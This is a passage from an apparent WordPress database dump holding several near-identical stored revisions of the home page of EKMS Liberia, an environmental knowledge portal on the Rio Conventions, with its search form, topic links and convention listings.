value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:26:38','2019-11-12 01:26:38','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1866,1,'2019-11-12 01:28:20','2019-11-12 01:28:20','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:28:20','2019-11-12 01:28:20','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1867,1,'2019-11-12 01:29:49','2019-11-12 01:29:49','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:29:49','2019-11-12 01:29:49','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1868,1,'2019-11-12 01:32:18','2019-11-12 01:32:18','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></figure>\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:32:18','2019-11-12 01:32:18','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1869,1,'2019-11-12 01:32:38','2019-11-12 01:32:38','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a 